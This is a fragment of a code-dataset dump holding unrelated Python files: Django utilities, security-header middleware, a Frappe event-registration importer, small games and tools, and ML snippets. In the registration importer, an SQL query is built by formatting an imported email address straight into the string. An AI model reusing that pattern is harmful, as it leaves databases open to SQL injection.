Свидание/boj29220.py","file_name":"boj29220.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"36687093284","text":"from django.db.models.query import Q\n\nfrom core.processors.base import QuerySetProcessor\nfrom datagrowth.datatypes import DocumentPostgres\n\n\nclass FilterProcessor(QuerySetProcessor):\n\n def get_query_filter_for_postgres(self, criteria):\n query_filter = Q()\n for key, values in criteria.items():\n for value in values:\n query_filter |= Q(**{\"properties__{}\".format(key): value})\n return query_filter\n\n def get_query_filter_for_non_postgres(self, criteria):\n query_filter = Q()\n for key, values in criteria.items():\n for value in values:\n query_filter |= Q(properties__contains='{}\": \"{}'.format(key, value))\n return query_filter\n\n def filter(self, query_set):\n criteria = {\n key: self.config.get(key).split(\"|\") for key in self.config.select_keys\n if self.config.get(key, None)\n }\n query_filter = self.get_query_filter_for_postgres(criteria) if issubclass(query_set.model, DocumentPostgres) \\\n else self.get_query_filter_for_non_postgres(criteria)\n return query_set.filter(query_filter)\n","repo_name":"fako/datascope","sub_path":"src/core/processors/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"63"} +{"seq_id":"43057368289","text":"# -*- coding: utf-8 -*-\nfrom django.conf import settings\nfrom 
django.core.exceptions import ImproperlyConfigured, ObjectDoesNotExist\n\nfrom security_headers.models import FramingAllowedFrom\n\n\ndef extra_security_headers_middleware(get_response):\n \"\"\"\n Sets security headers specified in SETTINGS on all responses.\n \"\"\"\n\n def middleware(req):\n resp = get_response(req)\n\n domain = req.get_host()\n\n try:\n allowed_domains = settings.FRAMING_ALLOWED_FROM\n if not isinstance(allowed_domains, list):\n raise ImproperlyConfigured(\n \"\"\"\n If specified in settings.py, FRAMING_ALLOWED_FROM must be a\n list of allowed domains.\n\n As a security measure, any list specified in settings.py\n overrides any database entries to provide sys admins with a\n veto over user settings.\n \"\"\"\n )\n\n if \"*\" in allowed_domains or domain in allowed_domains:\n resp[\"X-Frame-Options\"] = \"allow-from {}\".format(domain)\n else:\n resp[\"X-Frame-Options\"] = \"deny\"\n\n except AttributeError:\n try:\n allowed_domain = FramingAllowedFrom.objects.get(domain=req.get_host())\n resp[\"X-Frame-Options\"] = \"allow-from {}\".format(allowed_domain)\n except ObjectDoesNotExist:\n resp[\"X-Frame-Options\"] = \"deny\"\n\n if hasattr(settings, \"REFERRER_POLICY\"):\n resp[\"Referrer-Policy\"] = settings.REFERRER_POLICY\n else:\n resp[\"Referrer-Policy\"] = \"same-origin\"\n\n if hasattr(settings, \"FEATURE_POLICY\"):\n resp[\"Feature-Policy\"] = \"; \".join(settings.FEATURE_POLICY)\n else:\n resp[\"Feature-Policy\"] = \"; \".join(\n [\n \"autoplay 'none'\",\n \"camera 'none'\",\n \"display-capture 'none'\",\n \"document-domain 'none'\",\n \"encrypted-media 'none'\",\n \"fullscreen *\",\n \"geolocation 'none'\",\n \"microphone 'none'\",\n \"midi 'none'\",\n \"payment 'none'\",\n \"vr *\",\n ]\n )\n\n return resp\n\n return middleware\n","repo_name":"rogue707Dev/Django-security-headers","sub_path":"security_headers/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"6290679712","text":"from __future__ import unicode_literals\nimport frappe\nfrom frappe.model.document import Document\nfrom frappe import _\nfrom frappe.utils.data import getdate\nimport csv\nimport re\nimport datetime\nfrom lifefair.lifefair.utils import add_log\nfrom random import randint\nfrom datetime import timedelta\nfrom datetime import date\nfrom datetime import datetime\n\nclass Registration(Document):\n def create_ticket(self, ignore_permissions=False):\n if not ignore_permissions:\n self.date = date.today()\n \n # get random 18 digit barcode\n self.barcode = get_barcode(18)\n \n # get ticket number (####-####-####)\n self.ticket_number = get_ticket_code()\n \n self.type = \"LF-Ticket\"\n self.email_clerk = frappe.session.user or frappe.get_doc(\"Ticketing Settings\", \"Ticketing Settings\", \"email_clerk\")\n \n meeting = frappe.get_doc('Meeting', self.meeting)\n registration_date = self.date\n meeting_date = meeting.date_date_format #datetime.datetime.strptime(meeting.date_date_format, '%d-%m-%Y')\n \n reg = getdate(registration_date) + timedelta(days=10)\n met = meeting_date - timedelta(days=8)\n \n \n earliest = min(reg, met)\n self.meldedatum = earliest\n \n deadline = date.today() + timedelta(days=7)\n self.deadline_daten_an_partner = deadline\n \n self.save(ignore_permissions=ignore_permissions)\n \n \n return\n pass\n\n\ndef get_barcode(l):\n # generate random barcode\n barcode = ''\n for i in range(l):\n barcode += str(randint(0,9))\n # check if 
this is already in the database\n db = frappe.get_all(\"Registration\", filters={'barcode': barcode}, fields=['name'])\n if len(db) > 0:\n # it's in the database, retry\n barcode = get_barcode(l)\n return barcode\n\ndef get_ticket_code():\n # generate random ticket code\n ticket_code = ''\n for i in range(14):\n ticket_code += str(randint(0,9))\n ticket_code = list(ticket_code)\n ticket_code[4] = \"/\"\n ticket_code[9] = \"/\"\n ticket_code = \"\".join(ticket_code)\n # check if this is already in the database\n db = frappe.get_all(\"Registration\", filters={'ticket_number': ticket_code}, fields=['name'])\n if len(db) > 0:\n # it's in the database, retry\n ticket_code = get_ticket_code()\n return ticket_code\n \n@frappe.whitelist()\ndef import_xing(content, meeting):\n new_regs = []\n new_pers = []\n \n # field definition\n TICKETNO = 0 # ticket number cell A\n BARCODE = 1 # barcode cell B\n REMARKS = 2 # remarks field (\"Kategorie\")\n STATUS = 4 # status ['Bezahlt', 'Storniert', 'Versendet']\n DATE = 5 # order date (13.07.2018, 16:56)\n SALUTATION = 10\n TITLE = 11\n FIRST_NAME = 12\n LAST_NAME = 13\n EMAIL = 14\n COMPANY = 15\n PHONE = 50 # AY\n STREET = 26 # AA \n PINCODE = 28 # AC\n CITY = 29 # AD\n FUNCTION = 49 # AX \n BLOCK = 52 # BA, contains IF.xx\n TYPE = 3\n PAYMENT = 44 # AS\n INVOICENO = 43 # AR\n CODE = 47 # AV, \"Gutscheincode\", e.g. \"S18STAFF\"\n PARTICIPATION = 51 # AZ, \"Ich nehme teil\" \n PHONE_2 = None\n \n isfirst = True\n # read csv\n elements = csv.reader(content.splitlines(), dialect=csv.excel)\n counter = 0\n # process elements\n for element in elements:\n if isfirst:\n isfirst = False;\n # find colums codes\n i = 0\n for column in element:\n if column == \"Ticketnummer\":\n TICKETNO = i\n elif column == \"Barcode\":\n BARCODE = i\n elif column == \"Kategorie\": \n REMARKS = i\n elif column == \"Status\": \n STATUS = i\n elif column == \"Bestelldatum\":\n DATE = i\n elif column == \"Anrede\":\n SALUTATION = i\n elif column == \"Titel\":\n TITLE = i\n elif column == \"Vorname\":\n FIRST_NAME = i\n elif column == \"Nachname\":\n LAST_NAME = i\n elif column == \"Ticket-Email\":\n EMAIL = i\n elif column == \"Firma\":\n COMPANY = i\n elif column == \"Telefon\":\n PHONE = i\n elif column == \"Telefonnummer\":\n PHONE_2 = i\n elif column == \"Strasse\":\n STREET = i\n elif column == \"Postleitzahl\": \n PINCODE = i\n elif column == \"Ort\":\n CITY = i\n elif column == \"Funktion\":\n FUNCTION = i\n elif \"Innovationsforen\" in column:\n BLOCK = i\n elif column == \"Ticketart\":\n TYPE = i\n elif column == \"Bezahlart\":\n PAYMENT = i\n elif column == \"Rechnungsnummer\":\n INVOICENO = i\n elif column == \"Gutscheincode\":\n CODE = i\n elif \"Ich nehme teil\" in column:\n PARTICIPATION = i\n i += 1\n continue\n counter += 1\n # check if the ticket is already in the database\n db_regs = frappe.get_all(\"Registration\", filters={'ticket_number': element[TICKETNO]}, fields=['name'])\n if db_regs:\n # ticket is already in the database, update\n reg = frappe.get_doc(\"Registration\", db_regs[0]['name'])\n status = parse_status(element[STATUS], element[REMARKS])\n reg.status = status\n reg.type = element[TYPE]\n reg.payment = element[PAYMENT]\n reg.invoice_number = element[INVOICENO]\n reg.phone = element[PHONE]\n reg.code = element[CODE]\n reg.participation = element[PARTICIPATION]\n # find block\n block = find_block(element[BLOCK], meeting)\n reg.block = block\n try:\n reg.save()\n frappe.db.commit()\n except Exception as e:\n frappe.log_error(\"Import Xing Error\", 
\"Update Registration failed. {0}\".format(e)) \n        else:\n            # ticket is not in the database, create\n            # check email address to find person\n            db_person = frappe.get_all(\"Person\", filters={'email': element[EMAIL]}, fields=['name'])\n            # iterate over email2 and email3 in case of no hit\n            if not db_person:\n                db_person = frappe.get_all(\"Person\", filters={'email2': element[EMAIL]}, fields=['name'])\n            if not db_person:\n                db_person = frappe.get_all(\"Person\", filters={'email3': element[EMAIL]}, fields=['name'])\n            phone = element[PHONE]\n            if PHONE_2 and element[PHONE_2] and element[PHONE_2] != \".\":\n                phone = element[PHONE_2]\n            if db_person:\n                person_name = db_person[0]['name']\n                # get person, check website_description and update if empty\n                person = frappe.get_doc(\"Person\", db_person[0]['name'])\n                if not person.website_description:\n                    person.website_description = \"{0}, {1}\".format(element[FUNCTION], element[COMPANY])\n                # update phone number if missing\n                if not person.company_phone:\n                    person.company_phone = phone\n                person.save()\n            else:\n                # person not found, create new person\n                new_person = create_person(company=element[COMPANY], first_name=element[FIRST_NAME], \n                    last_name=element[LAST_NAME], title=element[TITLE],\n                    salutation=element[SALUTATION], email=element[EMAIL], phone=phone, \n                    function=element[FUNCTION], street=element[STREET], pincode=element[PINCODE], \n                    city=element[CITY], source=\"from xing\")\n                if new_person:\n                    new_pers.append(new_person)\n                    person_name = new_person\n                else:\n                    frappe.log_error(\"Import Xing Error\", \"Failed to insert person {0} {1} (Ticket: {2})\".format(element[FIRST_NAME], element[LAST_NAME], element[TICKETNO]))\n            \n            # create the new registration\n            # find block\n            block = find_block(element[BLOCK], meeting)\n            # parse date stamp (13.07.2018, 16:56)\n            date_fields = element[DATE].split(',')[0].split('.')\n            if len(date_fields) >= 3:\n                # proper date stamp\n                date = \"{0}-{1}-{2}\".format(date_fields[2], date_fields[1], date_fields[0])\n            else:\n                # found float timestamp (Excel serial date)\n                # note: `from datetime import datetime` above shadows the datetime module,\n                # so the imported class and timedelta are used directly here\n                zerodate = datetime(1899, 12, 30)\n                delta = timedelta(days=float(element[DATE]))\n                converted_date = zerodate + delta\n                date = \"{year:04d}-{month:02d}-{day:02d}\".format(year=converted_date.year, month=converted_date.month, day=converted_date.day)\n            # parse status ['Bezahlt', 'Storniert', 'Versendet'] > [Tentative, Confirmed, Cancelled, Paid, Sent]\n            status = parse_status(element[STATUS], element[REMARKS])\n            try:\n                registration = frappe.get_doc({\n                    'doctype': \"Registration\",\n                    'person': person_name,\n                    'meeting': meeting,\n                    'block': block,\n                    'date': date,\n                    'remarks': element[REMARKS],\n                    'ticket_number': element[TICKETNO],\n                    'barcode': element[BARCODE],\n                    'type': element[TYPE],\n                    'payment': element[PAYMENT],\n                    'invoice_number': element[INVOICENO],\n                    'phone': phone,\n                    'status': status,\n                    'code': element[CODE],\n                    'participation': element[PARTICIPATION]\n                })\n                registration = registration.insert()\n                reg_name = registration.name\n                frappe.db.commit()\n                new_regs.append(reg_name)\n            except Exception as e:\n                frappe.log_error(\"Import Xing Error\", \"Insert Registration failed. 
{0} (Ticket: {1})\".format(e, element[TICKETNO]))\n add_log(title= _(\"Xing Import complete\"),\n message = ( _(\"Import of {0} registrations ({1}) and {2} contacts ({3}).\")).format(\n len(new_regs), new_regs, len(new_pers), new_pers),\n topic = \"Xing\") \n return { 'registrations': new_regs, 'people': new_pers }\n\ndef create_person(first_name, last_name, email, title=None, salutation=None, company=None, function=None, phone=None,\n street=None, pincode=None, city=None, source=\"from xing\"):\n # check if the person is already in the database (by email)\n sql_query = \"\"\"SELECT `name` \n FROM `tabPerson`\n WHERE `email` = '{email}'\n OR `email2` = '{email}'\n OR `email3` = '{email}';\"\"\".format(email=email)\n db_person = frappe.db.sql(sql_query, as_dict=True)\n person_name = None\n if not db_person:\n # check if company exists\n company_matches = None\n if company:\n company_matches = frappe.get_all(\"Organisation\", filters={'official_name': company}, fields=['name'])\n # do not insert companies, too many typo issues\n \"\"\"if not company_matches and company and company != \"\":\n company = frappe.get_doc({\n 'doctype': \"Organisation\",\n 'official_name': company\n })\n try:\n company.insert()\n except Exception as e:\n frappe.log_error(\"Insert company {0} failed {1}\".format(company, e)) \"\"\"\n full_name = \"{0} {1}\".format(first_name, last_name)\n if title:\n long_name = \"{0} {1} {2}\".format(title, first_name, last_name)\n else:\n long_name = full_name\n try:\n first_characters = last_name[0:4].upper()\n except:\n try:\n first_characters = last_name.upper()\n except:\n first_characters = \"NN\"\n gender = salutation\n if gender == \"Herr\":\n letter_salutation = \"Sehr geehrter Herr\"\n elif gender == \"Frau\":\n letter_salutation = \"Sehr geehrte Frau\"\n else:\n gender = \"\"\n letter_salutation = \"\"\n person = frappe.get_doc({\n 'doctype': \"Person\",\n 'first_name': first_name,\n 'last_name': last_name,\n 'full_name': full_name,\n 'long_name': long_name,\n 'first_characters': first_characters,\n 'email': email,\n 'company_phone': phone,\n 'title': title,\n 'gender': gender,\n 'letter_salutation': letter_salutation,\n 'website_description': \"{0}, {1}\".format(function, company),\n 'remarks': \"{5}, {1} @ {0}, {2}, {3} {4}\".format(company, function, \n street, pincode, city, source)\n })\n try:\n person = person.insert()\n # only insert company reference if provided (and matched)\n if company_matches and company and company != \"\":\n if function and function != \"\":\n organisation = person.append('organisations', {})\n organisation.organisation = company\n organisation.function = function\n organisation.is_primary = 0\n organisation.notes = source\n person.primary_organisation = company\n person.primary_function = function\n person.save()\n person_name = person.name\n frappe.db.commit() \n except Exception as e:\n frappe.log_error(\"Import Xing Error\", \"Insert Person {1} {2} failed. 
{3}: {0}\".format(e, first_name, last_name, source)) \n #frappe.log_error(person_name)\n return person_name\n\ndef find_block(block_field, meeting):\n # regex block finder\n p = re.compile('IF.\\d\\d')\n # find block in the source text\n match_block = p.match(block_field)\n if match_block:\n block = \"{0} {1}\".format(meeting, match_block.group(0))\n # check if the block exists in the db\n db_block = frappe.get_all(\"Block\", \n filters=[['name', 'LIKE', '%{0}%'.format(block)],\n ['meeting', '=', meeting]], \n fields=['name'],\n order_by='name ASC')\n if len(db_block) > 0:\n block = db_block[0]['name']\n else:\n block = None\n else:\n block = None \n return block\n \ndef parse_status(xing_status, remarks=None):\n status = None\n # parse from normal status\n if xing_status == \"Bezahlt\":\n status = \"Paid\"\n elif xing_status == \"Storniert\":\n status = \"Cancelled\"\n elif xing_status == \"Versendet\":\n status = \"Sent\"\n # override status in special cases: Warteliste in remarks is tentative (except on cancellations)\n if not (status == \"Cancelled\") and \"warteliste\" in remarks.replace(\" \", \"\").lower():\n status = \"Tentative\"\n return status\n","repo_name":"libracore/lifefair","sub_path":"lifefair/lifefair/doctype/registration/registration.py","file_name":"registration.py","file_ext":"py","file_size_in_byte":16046,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"63"} +{"seq_id":"24995398184","text":"import os\nimport os.path as path\nimport yaml\nimport jinja2\n\nfrom composer import composer\nfrom helpers.utils import apath, issubdir, mergedicts, snake_case\n\n\nclass ConfigHandler:\n def __init__(self):\n self.configs = {}\n self.configs = self.load_config(apath('~/.hoprc'))\n\n def load_config(self, yaml_file):\n with open(yaml_file) as f:\n config_map = yaml.safe_load(f)\n\n env = jinja2.Environment(loader=jinja2.FileSystemLoader(searchpath='/'))\n template = env.get_template(yaml_file)\n\n config = yaml.safe_load(template.render(**config_map))\n return config\n\n def current_project(self):\n current_project = None\n project_paths = {k: apath(v['path']).rstrip('/') for k, v in self.configs.get('projects', {}).items()}\n current_path = os.getcwd()\n for project, project_path in project_paths.items():\n if issubdir(current_path, project_path):\n current_project = project\n\n return current_project\n\n def current_env(self):\n project = self.current_project()\n if project:\n formatted_project_name = snake_case(project).upper()\n env_var = f'HOP_ENV_{formatted_project_name}'\n return os.getenv(env_var, None)\n\n return None\n\n def project_configs(self, project_name=current_project):\n project_global_config = (\n self.configs\n .get('projects', {})\n .get(project_name))\n\n if project_global_config:\n project_root = project_global_config.get('path')\n if project_root:\n config_path = apath(f'{project_root}/.hop')\n if path.exists(config_path):\n project_specific_config = self.load_config(config_path)\n combined = mergedicts(project_global_config, project_specific_config)\n return combined\n else:\n return project_global_config\n else:\n composer.add('error', f'path is not configured for project {project_name}')\n else:\n composer.add('error', f'Project is not configured')\n\n\nconfigs = 
ConfigHandler()\n","repo_name":"task-hopper/task-hopper","sub_path":"hop/config_handler.py","file_name":"config_handler.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"} +{"seq_id":"24654943715","text":"# Super easy solar system based on the unit circle\n# with coordinates (cosx, siny)\n# Jean Joubert 7 April 2020\n# Moving the sun gives an idea of vortex movements of the planets and moons\n\nimport turtle\nimport math, time\n\nwin = turtle.Screen()\nwin.setup(1100,1100)\nwin.bgcolor('black')\nwin.tracer(0)\n\nsun = turtle.Turtle()\nsun.shape('circle')\nsun.shapesize(5,5)\nsun.color('yellow')\n\n\n\nclass Planet(turtle.Turtle):\n def __init__(self,radius, color, size, star):\n super().__init__(shape='circle')\n self.radius = radius\n self.c = color\n self.color(self.c)\n self.size = size\n self.shapesize(size,size)\n #self.up()\n self.angle = 0\n self.star = star\n\n def move(self):\n x = self.radius*math.cos(self.angle) # radians\n y = self.radius*math.sin(self.angle)\n\n self.goto(self.star.xcor()+x,self.star.ycor()+y)\n\n\n\nearth = Planet(160,'blue', 1, sun)\nmercury = Planet(80, 'grey', 0.6, sun)\nvenus = Planet(120, 'orange', 0.8, sun)\nmars = Planet(200, 'red', 0.9, sun)\n\nmoon = Planet(40, 'grey', 0.2, earth) # moon a 'planet' that orbits earth\nphobos = Planet(40, 'grey', 0.2, mars)\ndeimos = Planet(35, 'white', 0.2, mars)\n\nmyList = [sun, earth, mercury, venus, mars, moon, phobos, deimos]\n\nfor i in myList:\n i.up()\n i.goto(-1000,1000)\n i.down()\n\n\n\nwhile True:\n win.update()\n for i in range(1,7):\n myList[i].move()\n\n moon.angle += 0.06\n phobos.angle += 0.06\n deimos.angle += 0.08\n \n mercury.angle += 0.05\n venus.angle += 0.03\n earth.angle += 0.01\n mars.angle += 0.007\n\n sun.goto(sun.xcor()+1, sun.ycor()-1)\n \n time.sleep(0.01)\n \n \n","repo_name":"jeanjoubert10/Solar-system-with-python-3-and-turtle","sub_path":"2 Solar system vortex.py","file_name":"2 Solar system vortex.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"73742518279","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom Data_loader import Data_loader\nfrom config import Config\nfrom dataset_processing import create_dataset_global\nfrom torch_geometric.nn import global_mean_pool as gap, global_max_pool as gmp\nfrom torch_scatter import scatter_max, scatter_mean\n\nclass DeepWalk(nn.Module):\n def __init__(self,args):\n super(DeepWalk, self).__init__()\n path = '/home/yuanyuan/workplace/influence/data/sample2_dataset_unc_norm.npy'\n self.config = Config\n self.dataset = create_dataset_global(path)\n self.num_communities = args.num_communities\n self.args = args\n '''\n Data(x=x, edge_index=edge_index, edge_attr=edge_attr, y=y, community=community,\n pooling_edges=pooling_edges, community_idx_for_pooling=community_idx_for_pooling,\n multi_community_nodes=multi_community_nodes, multi_community_index=multi_community_index,\n adj_inter=adj_inter, adj_intra=adj_intra, edge_attr_inter=edge_attr_inter,\n edge_attr_intra=edge_attr_intra)\n '''\n self.linear_feature = nn.Linear(60,20)\n self.linear_DW = nn.Linear(20,20)\n self.linear = nn.Linear(40,self.config.output_size)\n self.demographic_linear = nn.Linear(8,20)\n self.purchase_linear = nn.Linear(12,20)\n \n def community_pooling(self, x, community, multi_community_nodes, multi_community_index):\n x = 
torch.cat((x,x[multi_community_nodes,:]), dim=0)\n community = torch.cat((community.view(-1), multi_community_index), dim=0)\n community = community.view(-1,1).repeat(1,x.size()[1])\n res1 = scatter_mean(x, community, dim=0, dim_size=self.num_communities)\n res2, _ = scatter_max(x, community, dim=0, dim_size=self.num_communities)\n return torch.cat([res1,res2], dim=1)\n \n def forward(self,x):\n\n demographic = F.relu(self.demographic_linear(self.dataset.x[:,:8].to(self.args.device)))\n purchase = F.relu(self.purchase_linear(self.dataset.x[:,8:].to(self.args.device)))\n\n y = torch.cat((demographic,purchase,x),1)\n\n y = F.relu(self.linear_feature(y))\n\n y = self.community_pooling(y,self.dataset.community.to(self.args.device),self.dataset.multi_community_nodes.to(self.args.device),self.dataset.multi_community_index.to(self.args.device))\n # batch_size * embedding_size\n\n y = F.relu(self.linear(y))\n\n return y\n\n\n\n\n\n\n\n\n\n\n\n\n \n\n\n \n","repo_name":"YuanYuan98/Community-Value-Prediction-Baseline","sub_path":"src/DeepWalk.py","file_name":"DeepWalk.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"24595112735","text":"#generat next move\r\ndef incMoveSet():\r\n global moveSet, moveNumber, depth\r\n moveNumber, moveSet[0] = moveNumber+1, moveSet[0]+1\r\n for i in range(len(moveSet)):\r\n if moveSet[i] == 6:\r\n moveSet[i] = 0\r\n if i == len(moveSet)-1:\r\n moveSet.append(0)\r\n depth += 1\r\n print('Depth = ',str(depth))\r\n else:\r\n moveSet[i+1] += 1\r\n\r\n#Check for redundancy in move\r\ndef isRedundant():\r\n global moveSet\r\n status = False\r\n if len(moveSet) > 1:\r\n for i in range(len(moveSet)-1):\r\n status = status or moveSet[i] == moveSet[i+1]\r\n return status\r\n else:\r\n return False\r\n#initilization\r\nf, l, r, b, depth, moveSet, moveNumber = [], [], [], [], 0, [0], 0\r\n\r\n#get inputs\r\nfor face in ['f','l','r','b']:\r\n print('Enter ' + face)\r\n for i in range(10):\r\n\t eval(face).append(input())\r\n\r\n#store a copy\r\nfront, left, right, bottom = f[:], l[:], r[:], b[:]\r\n\r\n#try all possible combinations\r\nwhile (all([False for face in [front, left, right, bottom] for i in range(len(eval('face'))) if(eval('face')[0] is not eval('face')[i])])) == False and depth < 20:\r\n front, left, right, bottom = f[:], l[:], r[:], b[:]\r\n for i in moveSet:\r\n if i == 0:\r\n front[0], front[2], front[3], front[5], front[6], front[9], right[0], right[1], right[2], right[4], right[5], right[7], left[0], bottom[0] = right[7], right[4], right[1], right[5], right[2], right[0], front[9], front[3], front[6], front[2], front[5], front[0], bottom[0], left[0]\r\n elif i == 1:\r\n front[0], front[1], front[2], front[4], front[5], front[7], right[0], bottom[7], left[0], left[2], left[3], left[5], left[6], left[9] = left[9], left[3], left[6], left[2], left[5], left[0], bottom[7], right[0], front[7], front[4], front[1], front[5], front[2], front[0]\r\n elif i == 2:\r\n front[0], bottom[9], left[0], left[1], left[2], left[4], left[5], left[7], right[0], right[2], right[3], right[5], right[6], right[9] = bottom[9], front[0], right[9], right[3], right[6], right[2], right[5], right[0], left[7], left[4], left[1], left[5], left[2], left[0]\r\n elif i == 3:\r\n left[9], right[7], front[4], front[5], front[6], front[7], front[8], front[9], bottom[2], bottom[5], bottom[4], bottom[0], bottom[1], bottom[7] = right[7], left[9] , bottom[2], bottom[5], bottom[4], bottom[0], bottom[1], 
bottom[7], front[4], front[5], front[6], front[7], front[8], front[9]\r\n elif i == 4:\r\n front[7], right[9], left[4], left[5], left[6], left[7], left[8], left[9], bottom[4], bottom[5], bottom[6], bottom[7], bottom[8], bottom[9] = right[9], front[7], bottom[4], bottom[5], bottom[6], bottom[7], bottom[8], bottom[9], left[4], left[5], left[6], left[7], left[8], left[9]\r\n elif i == 5:\r\n front[9], left[7], right[4], right[5], right[6], right[7], right[8], right[9], bottom[6], bottom[5], bottom[2], bottom[9], bottom[3], bottom[0] = left[7], front[9], bottom[6], bottom[5], bottom[2], bottom[9], bottom[3], bottom[0], right[4], right[5], right[6], right[7], right[8], right[9]\r\n if (all([False for face in [front, left, right, bottom] for i in range(len(eval('face'))) if(eval('face')[0] is not eval('face')[i])])) == False:\r\n incMoveSet()\r\n while(isRedundant() == True):\r\n incMoveSet()\r\n\r\nprint(moveSet)\r\n","repo_name":"harikmr2795/Pyraminx-Solver","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"10350954795","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 21 14:18:44 2017\r\n\r\n@author: yjl20\r\n\"\"\"\r\n\r\n#modules importation\r\nfrom fingerprints import fingerprinter\r\nimport pandas as pd \r\nimport os\r\nimport random as rnd\r\n\r\n#fingerprints stored in a csv file importation\r\nfingerprints_audios = pd.read_csv('audios_fingerprints.csv' , sep = ';' , header = 0)\r\n\r\n#importation of the all testing files\r\ndef import_audios(path_files):\r\n list_audios = []\r\n for file in os.listdir(path_files):\r\n audio = path_files + \"/\" + file\r\n list_audios.append(audio)\r\n return list_audios\r\n\r\n#camparison of the fingerprints\r\ndef comparison_audios(audios , numbcomaprison , file_fingerprints , name_column = 'fingerprints'):\r\n number_audios = len(audios)\r\n \r\n #randomly choose file to compare\r\n indexes = [rnd.randint(0,number_audios) for k in range(numbcomaprison)]\r\n list_output = []\r\n for index in indexes:\r\n choosen_audio = audios[index]\r\n for fingerprint in file_fingerprints[name_column]:\r\n if fingerprinter(choosen_audio) == fingerprint:\r\n temp_file = choosen_audio.split(\"/\")\r\n list_output.extend([[temp_file[3] , fingerprinter(choosen_audio) , fingerprint]])\r\n #storage as dataframe for a better view\r\n comparison = pd.DataFrame(list_output) \r\n comparison.columns = ['name_audio' , 'fingerprint_genereated' , 'fingerprint_stored_file'] \r\n print(comparison)\r\n \r\n\r\n\r\npath_audios = 'genres/genres_converted/test_files'\r\n\r\nlist_audios = import_audios(path_audios)\r\nexp = comparison_audios(list_audios , 5 , fingerprints_audios)\r\n\r\n\r\n \r\n \r\n\r\n\r\n","repo_name":"plejeail/Python_Music_Recommender","sub_path":"package/tools/recognize.py","file_name":"recognize.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"41441310365","text":"import os\n\ndef findWord():\n s = ''\n while (True):\n n = 0\n list = os.listdir()\n \n print('-------------------------------------')\n print(\"@ Write the string you are looking for\")\n print(\"@ Or write Q to quit\\n\")\n s = input().lower()\n print('')\n \n if (s == 'q' or s=='Q'):\n break;\n \n elif (s.strip() == ''): \n print('@ Please write a valid string!\\n')\n pass\n else:\n for el in list:\n if (el != \"@ find word.py\"):\n 
if s in open(el).read().lower() or s in el.lower():\n                        print(el)\n                        n += 1\n            print('\\n@ The operation has been done successfully!')\n            print('@ '+str(n)+' files contain the string.\\n')\n    \nif __name__==\"__main__\":\n    print('=== find word ===\\n\\n')\n    findWord()\n","repo_name":"fabiomarigo7/python-tools","sub_path":"find_word.py","file_name":"find_word.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"72614349642","text":"import pygame\r\n\r\nclass Ship():\r\n\r\n    def __init__(self, ai_settings, screen):\r\n        \"\"\"Initialize the ship and its settings\"\"\"\r\n        self.screen = screen\r\n        self.ai_settings = ai_settings\r\n\r\n        # load the image of the ship and get its bounding rectangle\r\n        self.image = pygame.image.load('images/ship.png')\r\n        self.rect = self.image.get_rect()\r\n        self.screen_rect = screen.get_rect()\r\n\r\n        # place every new ship in the center of the screen bottom\r\n        self.rect.centerx = self.screen_rect.centerx\r\n        self.rect.bottom = self.screen_rect.bottom\r\n\r\n        # store a decimal value in the center attribute\r\n        self.center = float(self.rect.centerx)\r\n\r\n        # movement flags\r\n        self.moving_right = False\r\n        self.moving_left = False\r\n\r\n    def update(self):\r\n        \"\"\"Update the position of the ship\"\"\"\r\n        if self.moving_right and self.rect.right < self.screen_rect.right:\r\n            self.center += self.ai_settings.ship_speed_factor\r\n        if self.moving_left and self.rect.left > 0:\r\n            self.center -= self.ai_settings.ship_speed_factor\r\n\r\n        # update the rect according to self.center\r\n        self.rect.centerx = self.center\r\n\r\n    def blitme(self):\r\n        \"\"\"Draw the ship at its current position\"\"\"\r\n        self.screen.blit(self.image, self.rect)\r\n","repo_name":"song100/learn_python","sub_path":"ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"28981160423","text":"import numpy as np\nfrom cliport.tasks.task import Task\nfrom cliport.utils import utils\nimport random\nimport pybullet as p\nimport os\nimport copy\n\nclass CodeStackWall(Task):\n    \"\"\"Place three blocks in a row on the tabletop to build a wall.\"\"\"\n    def __init__(self):\n        super().__init__()\n        self.max_steps = 20\n        self.lang_template = \"Build a wall by stacking three symmetric blocks on top of each other. 
